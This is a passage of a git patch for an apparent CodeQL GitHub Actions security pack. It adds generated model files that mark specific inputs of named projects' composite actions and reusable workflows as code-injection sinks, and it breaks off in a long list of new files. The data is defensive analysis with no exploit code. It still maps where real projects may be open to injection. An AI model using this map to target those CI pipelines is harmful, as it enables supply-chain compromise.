a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml new file mode 100644 index 00000000000..9c556053d66 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wntrblm/nox", "*", "inputs.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml new file mode 100644 index 00000000000..6121c00ccfd --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["xrplf/rippled", "*", "inputs.configuration", "code-injection", "generated"] + - ["xrplf/rippled", "*", "inputs.cmake-target", "code-injection", "generated"] + - ["xrplf/rippled", "*", "inputs.cmake-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml new file mode 100644 index 00000000000..789bdb53aed --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zcash/zcash", "*", "inputs.destination", "code-injection", "generated"] + - ["zcash/zcash", "*", "inputs.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml new file mode 100644 index 00000000000..58389ad753e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zenml-io/zenml", "*", "inputs.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml new file mode 100644 index 00000000000..853948c5ec3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zeroc-ice/ice", "*", "inputs.flags", "code-injection", "generated"] + - ["zeroc-ice/ice", "*", "inputs.make_flags", "code-injection", "generated"] \ No newline at end of file From 83f9527cc489194e143ca2e21c724a4b10ec954d Mon Sep 17 00:00:00 2001 
From: jorgectf Date: Thu, 11 Apr 2024 11:25:54 +0200 Subject: [PATCH 0164/1267] Add models for reusable workflows sinks --- .../0xpolygon_polygon-edge.model.yml | 6 ++++ .../reusable-workflows/8vim_8vim.model.yml | 9 ++++++ .../actions_reusable-workflows.model.yml | 11 +++++++ .../reusable-workflows/adap_flower.model.yml | 8 +++++ .../aio-libs_multidict.model.yml | 7 +++++ .../aio-libs_yarl.model.yml | 7 +++++ .../airbytehq_airbyte.model.yml | 6 ++++ .../alphagov_collections.model.yml | 6 ++++ .../alphagov_frontend.model.yml | 6 ++++ .../alphagov_publishing-api.model.yml | 6 ++++ .../reusable-workflows/apache_druid.model.yml | 15 ++++++++++ .../reusable-workflows/apache_flink.model.yml | 7 +++++ .../reusable-workflows/apache_spark.model.yml | 7 +++++ .../argilla-io_argilla.model.yml | 6 ++++ .../argoproj_argo-cd.model.yml | 8 +++++ .../argoproj_argo-rollouts.model.yml | 8 +++++ .../aws-amplify_amplify-ui.model.yml | 6 ++++ .../reusable-workflows/azure_apiops.model.yml | 6 ++++ .../azure_mlops-templates.model.yml | 13 +++++++++ .../bbq-beets_avocaddo-cmw.model.yml | 9 ++++++ .../bbq-beets_mobile-ci-cd.model.yml | 9 ++++++ .../bbq-beets_yujincat-action.model.yml | 7 +++++ .../bdunderscore_modular-avatar.model.yml | 6 ++++ .../benc-uk_workflow-dispatch.model.yml | 6 ++++ .../bridgecrewio_checkov.model.yml | 8 +++++ .../bugsnag_bugsnag-ruby.model.yml | 6 ++++ ...ecodealliance_wasm-micro-runtime.model.yml | 22 ++++++++++++++ .../celo-org_celo-blockchain.model.yml | 7 +++++ .../cemu-project_cemu.model.yml | 6 ++++ .../cesiumgs_cesium-unreal.model.yml | 29 +++++++++++++++++++ .../reusable-workflows/cgal_cgal.model.yml | 6 ++++ .../checkstyle_checkstyle.model.yml | 14 +++++++++ .../chia-network_actions.model.yml | 7 +++++ .../chipsalliance_chisel.model.yml | 7 +++++ .../clickhouse_clickhouse.model.yml | 14 +++++++++ .../cloudfoundry_cli.model.yml | 6 ++++ .../cocotb_cocotb.model.yml | 8 +++++ .../codeigniter4_codeigniter4.model.yml | 9 ++++++ .../com-lihaoyi_mill.model.yml 
| 7 +++++ .../cosmos_ibc-go.model.yml | 17 +++++++++++ .../crowdsecurity_crowdsec.model.yml | 7 +++++ .../cryptomator_cryptomator.model.yml | 7 +++++ .../daeuniverse_dae.model.yml | 7 +++++ .../dafny-lang_dafny.model.yml | 9 ++++++ .../dagger_dagger.model.yml | 7 +++++ .../dash-industry-forum_dash.js.model.yml | 7 +++++ .../datadog_dd-trace-go.model.yml | 6 ++++ .../datadog_dd-trace-py.model.yml | 7 +++++ .../datafuselabs_databend.model.yml | 7 +++++ .../dbt-labs_dbt-bigquery.model.yml | 14 +++++++++ .../dbt-labs_dbt-core.model.yml | 9 ++++++ .../dbt-labs_dbt-snowflake.model.yml | 14 +++++++++ .../decidim_decidim.model.yml | 6 ++++ .../defectdojo_django-defectdojo.model.yml | 6 ++++ ...dependencytrack_dependency-track.model.yml | 6 ++++ .../devexpress_testcafe.model.yml | 10 +++++++ .../dfhack_dfhack.model.yml | 18 ++++++++++++ .../docker_build-push-action.model.yml | 7 +++++ .../dragonwell-project_dragonwell11.model.yml | 6 ++++ .../earthly_earthly.model.yml | 22 ++++++++++++++ .../eclipse-vertx_vert.x.model.yml | 6 ++++ .../eclipse-vertx_vertx-sql-client.model.yml | 6 ++++ .../elastic_elasticsearch-net.model.yml | 6 ++++ .../element-hq_element-desktop.model.yml | 11 +++++++ .../etcd-io_bbolt.model.yml | 7 +++++ .../reusable-workflows/etcd-io_etcd.model.yml | 9 ++++++ .../eventstore_eventstore.model.yml | 7 +++++ .../expensify_app.model.yml | 6 ++++ ...xternal-secrets_external-secrets.model.yml | 7 +++++ .../facebook_create-react-app.model.yml | 6 ++++ .../facebookresearch_xformers.model.yml | 15 ++++++++++ .../falcosecurity_falco.model.yml | 11 +++++++ .../fastify_fastify.model.yml | 6 ++++ .../ferretdb_ferretdb.model.yml | 6 ++++ .../filecoin-project_venus.model.yml | 9 ++++++ .../firebase_firebase-unity-sdk.model.yml | 19 ++++++++++++ .../flarum_framework.model.yml | 6 ++++ .../fluent_fluent-bit.model.yml | 13 +++++++++ .../flux-iac_tofu-controller.model.yml | 6 ++++ .../flyteorg_flyte.model.yml | 8 +++++ .../foundatiofx_foundatio.model.yml | 8 +++++ 
.../freecad_freecad.model.yml | 6 ++++ .../getpelican_pelican.model.yml | 8 +++++ .../getporter_porter.model.yml | 6 ++++ .../getsentry_sentry-dart.model.yml | 7 +++++ .../getsentry_sentry-unity.model.yml | 7 +++++ .../gitpod-io_gitpod.model.yml | 6 ++++ .../gittools_gitversion.model.yml | 6 ++++ ...ooglecloudplatform_magic-modules.model.yml | 6 ++++ ...loudplatform_nodejs-docs-samples.model.yml | 7 +++++ .../gravitational_teleport.model.yml | 6 ++++ .../gravitl_netmaker.model.yml | 6 ++++ .../reusable-workflows/h2oai_wave.model.yml | 8 +++++ .../hadashia_vcontainer.model.yml | 7 +++++ .../hashicorp_boundary.model.yml | 6 ++++ .../hashicorp_consul.model.yml | 7 +++++ .../hashicorp_terraform-cdk.model.yml | 15 ++++++++++ ...hashicorp_terraform-provider-tfe.model.yml | 6 ++++ .../hashicorp_terraform.model.yml | 9 ++++++ .../hashicorp_vault.model.yml | 16 ++++++++++ .../reusable-workflows/heroku_cli.model.yml | 7 +++++ .../hitobito_hitobito.model.yml | 7 +++++ .../home-assistant_operating-system.model.yml | 7 +++++ .../homuler_mediapipeunityplugin.model.yml | 11 +++++++ .../huggingface_doc-builder.model.yml | 14 +++++++++ .../huggingface_transformers.model.yml | 7 +++++ .../hyperion-project_hyperion.ng.model.yml | 8 +++++ .../reusable-workflows/ibm_sarama.model.yml | 6 ++++ ...nloader_icloud_photos_downloader.model.yml | 6 ++++ .../immich-app_immich.model.yml | 6 ++++ .../reusable-workflows/inria_spoon.model.yml | 6 ++++ ...el-device-plugins-for-kubernetes.model.yml | 6 ++++ .../inverse-inc_packetfence.model.yml | 6 ++++ .../reusable-workflows/ispc_ispc.model.yml | 6 ++++ ..._intellij-platform-gradle-plugin.model.yml | 6 ++++ .../jupyter_docker-stacks.model.yml | 13 +++++++++ .../kairos-io_kairos.model.yml | 23 +++++++++++++++ .../kanidm_kanidm.model.yml | 6 ++++ .../kata-containers_kata-containers.model.yml | 20 +++++++++++++ .../reusable-workflows/kiali_kiali.model.yml | 16 ++++++++++ .../kotest_kotest.model.yml | 6 ++++ .../kubernetes_ingress-nginx.model.yml | 7 
+++++ .../kubescape_kubescape.model.yml | 9 ++++++ .../kubeshop_botkube.model.yml | 7 +++++ .../reusable-workflows/kumahq_kuma.model.yml | 9 ++++++ .../labring_sealos.model.yml | 15 ++++++++++ .../laion-ai_open-assistant.model.yml | 6 ++++ .../learningequality_kolibri.model.yml | 9 ++++++ .../lensesio_stream-reactor.model.yml | 6 ++++ .../leptos-rs_leptos.model.yml | 8 +++++ .../lightning-ai_pytorch-lightning.model.yml | 7 +++++ .../liquibase_liquibase.model.yml | 6 ++++ .../litestar-org_litestar.model.yml | 7 +++++ .../reusable-workflows/llvm_circt.model.yml | 13 +++++++++ .../lnbits_lnbits.model.yml | 6 ++++ .../lutris_lutris.model.yml | 6 ++++ .../reusable-workflows/mailu_mailu.model.yml | 8 +++++ .../mamba-org_mamba.model.yml | 7 +++++ ...anticoresoftware_manticoresearch.model.yml | 14 +++++++++ .../marcelotduarte_cx_freeze.model.yml | 6 ++++ ...xaml_materialdesigninxamltoolkit.model.yml | 9 ++++++ .../matter-labs_zksync-era.model.yml | 7 +++++ .../mattermost_desktop.model.yml | 6 ++++ .../mattermost_mattermost.model.yml | 10 +++++++ .../mealie-recipes_mealie.model.yml | 6 ++++ .../meshery_meshery.model.yml | 16 ++++++++++ .../meshtastic_firmware.model.yml | 10 +++++++ .../microcks_microcks.model.yml | 6 ++++ ...crosoft_applicationinsights-java.model.yml | 6 ++++ .../microsoft_chat-copilot.model.yml | 11 +++++++ .../microsoft_msquic.model.yml | 18 ++++++++++++ .../microsoft_oryx.model.yml | 6 ++++ .../microsoft_pr-metrics.model.yml | 6 ++++ ...oft_react-native-windows-samples.model.yml | 13 +++++++++ .../microsoft_vscode-cpptools.model.yml | 6 ++++ .../moby_buildkit.model.yml | 10 +++++++ .../reusable-workflows/moby_moby.model.yml | 7 +++++ .../mosaicml_composer.model.yml | 11 +++++++ .../msys2_setup-msys2.model.yml | 7 +++++ .../mudler_localai.model.yml | 7 +++++ .../mustardchef_wsabuilds.model.yml | 15 ++++++++++ .../reusable-workflows/n8n-io_n8n.model.yml | 6 ++++ .../napari_napari.model.yml | 6 ++++ .../reusable-workflows/nasa_fprime.model.yml | 9 ++++++ 
.../nautobot_nautobot.model.yml | 6 ++++ .../reusable-workflows/nektos_act.model.yml | 13 +++++++++ .../neovim_neovim.model.yml | 6 ++++ .../nethermindeth_nethermind.model.yml | 11 +++++++ .../newrelic_newrelic-dotnet-agent.model.yml | 10 +++++++ .../newrelic_newrelic-java-agent.model.yml | 7 +++++ .../newrelic_node-newrelic.model.yml | 9 ++++++ .../nexus-mods_nexusmods.app.model.yml | 9 ++++++ .../nginxinc_kubernetes-ingress.model.yml | 16 ++++++++++ .../nocodb_nocodb.model.yml | 7 +++++ .../reusable-workflows/novuhq_novu.model.yml | 20 +++++++++++++ .../npm_abbrev-js.model.yml | 6 ++++ .../reusable-workflows/npm_cli.model.yml | 7 +++++ .../npm_fs-minipass.model.yml | 6 ++++ .../npm_hosted-git-info.model.yml | 6 ++++ .../reusable-workflows/npm_ini.model.yml | 6 ++++ ...pm_json-parse-even-better-errors.model.yml | 6 ++++ .../npm_minify-registry-metadata.model.yml | 6 ++++ .../npm_mute-stream.model.yml | 6 ++++ .../npm_node-semver.model.yml | 6 ++++ .../npm_node-which.model.yml | 6 ++++ .../reusable-workflows/npm_nopt.model.yml | 6 ++++ .../npm_normalize-package-data.model.yml | 6 ++++ .../npm_write-file-atomic.model.yml | 6 ++++ .../onflow_cadence.model.yml | 9 ++++++ .../open-goal_jak-project.model.yml | 11 +++++++ ...pen-telemetry_opentelemetry-demo.model.yml | 6 ++++ ...try_opentelemetry-dotnet-contrib.model.yml | 7 +++++ ...n-telemetry_opentelemetry-dotnet.model.yml | 7 +++++ ...entelemetry-java-instrumentation.model.yml | 7 +++++ ...lemetry_opentelemetry-js-contrib.model.yml | 6 ++++ ...telemetry_opentelemetry-operator.model.yml | 8 +++++ .../openbao_openbao.model.yml | 11 +++++++ .../openhab_openhab-docs.model.yml | 9 ++++++ .../openmined_pysyft.model.yml | 7 +++++ .../opentofu_opentofu.model.yml | 9 ++++++ .../openttd_openttd.model.yml | 17 +++++++++++ .../openvinotoolkit_openvino.model.yml | 6 ++++ .../reusable-workflows/openxla_iree.model.yml | 12 ++++++++ .../reusable-workflows/openzfs_zfs.model.yml | 6 ++++ ...ator-framework_java-operator-sdk.model.yml | 
8 +++++ .../orange-opensource_hurl.model.yml | 6 ++++ ...aolosalvatori_servicebusexplorer.model.yml | 7 +++++ .../parcel-bundler_parcel.model.yml | 6 ++++ .../pardeike_harmony.model.yml | 6 ++++ .../reusable-workflows/pcsx2_pcsx2.model.yml | 12 ++++++++ .../pennylaneai_pennylane.model.yml | 8 +++++ ...necone-io_pinecone-python-client.model.yml | 6 ++++ .../pixie-io_pixie.model.yml | 8 +++++ .../plantuml_plantuml.model.yml | 6 ++++ .../powerdns_pdns.model.yml | 8 +++++ .../preactjs_preact.model.yml | 7 +++++ .../prismlauncher_prismlauncher.model.yml | 6 ++++ .../product-os_flowzone.model.yml | 6 ++++ .../project-oak_oak.model.yml | 7 +++++ .../reusable-workflows/prql_prql.model.yml | 6 ++++ .../pulumi_pulumi.model.yml | 10 +++++++ .../puppetlabs_puppetlabs-puppetdb.model.yml | 8 +++++ .../reusable-workflows/pyo3_maturin.model.yml | 6 ++++ .../reusable-workflows/pyo3_pyo3.model.yml | 6 ++++ .../python_cpython.model.yml | 7 +++++ .../pytorch_botorch.model.yml | 6 ++++ .../reusable-workflows/pytorch_xla.model.yml | 6 ++++ .../quarto-dev_quarto-cli.model.yml | 6 ++++ .../rancher_dashboard.model.yml | 9 ++++++ .../rasterio_rasterio.model.yml | 6 ++++ .../redisearch_redisearch.model.yml | 6 ++++ .../remix-run_remix.model.yml | 6 ++++ .../rmcrackan_libation.model.yml | 9 ++++++ .../rocketchat_rocket.chat.model.yml | 6 ++++ .../ruby_ruby.wasm.model.yml | 6 ++++ .../rustdesk_rustdesk.model.yml | 8 +++++ .../saadeghi_daisyui.model.yml | 7 +++++ .../sagemath_sage.model.yml | 12 ++++++++ .../schemastore_schemastore.model.yml | 7 +++++ .../scikit-learn_scikit-learn.model.yml | 6 ++++ .../seleniumhq_selenium.model.yml | 7 +++++ .../shaka-project_shaka-packager.model.yml | 8 +++++ .../shaka-project_shaka-player.model.yml | 9 ++++++ .../shimataro_ssh-key-action.model.yml | 6 ++++ .../softfever_orcaslicer.model.yml | 7 +++++ ...-mansion_react-native-reanimated.model.yml | 6 ++++ .../solana-labs_solana.model.yml | 6 ++++ .../sonarr_sonarr.model.yml | 7 +++++ 
.../speedb-io_speedb.model.yml | 7 +++++ ...ring-cloud_spring-cloud-dataflow.model.yml | 6 ++++ .../sqlfluff_sqlfluff.model.yml | 8 +++++ .../stdlib-js_stdlib.model.yml | 9 ++++++ .../stereokit_stereokit.model.yml | 10 +++++++ .../streetsidesoftware_cspell.model.yml | 6 ++++ .../supabase_auth.model.yml | 6 ++++ .../reusable-workflows/supabase_cli.model.yml | 6 ++++ .../tencent_hippy.model.yml | 9 ++++++ .../tgstation_tgstation.model.yml | 8 +++++ .../thesofproject_sof.model.yml | 6 ++++ .../tiann_kernelsu.model.yml | 8 +++++ .../tiledb-inc_tiledb.model.yml | 7 +++++ .../toeverything_affine.model.yml | 6 ++++ .../tracel-ai_burn.model.yml | 6 ++++ .../tribler_tribler.model.yml | 6 ++++ .../ubisoft_sharpmake.model.yml | 7 +++++ .../unity-technologies_ml-agents.model.yml | 6 ++++ .../reusable-workflows/urbit_urbit.model.yml | 7 +++++ .../uyuni-project_uyuni.model.yml | 7 +++++ .../vert-x3_vertx-hazelcast.model.yml | 7 +++++ .../reusable-workflows/vkcom_vkui.model.yml | 6 ++++ .../walletconnect_web3modal.model.yml | 6 ++++ .../warzone2100_warzone2100.model.yml | 6 ++++ .../wasmedge_wasmedge.model.yml | 10 +++++++ .../web-infra-dev_rspack.model.yml | 7 +++++ .../reusable-workflows/werf_werf.model.yml | 21 ++++++++++++++ .../widdix_aws-cf-templates.model.yml | 6 ++++ .../wildfly_wildfly.model.yml | 9 ++++++ .../yt-dlp_yt-dlp.model.yml | 11 +++++++ .../zenml-io_zenml.model.yml | 8 +++++ .../zephyrproject-rtos_zephyr.model.yml | 6 ++++ .../zitadel_zitadel.model.yml | 9 ++++++ 281 files changed, 2322 insertions(+) create mode 100644 ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml 
create mode 100644 ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml create mode 100644 
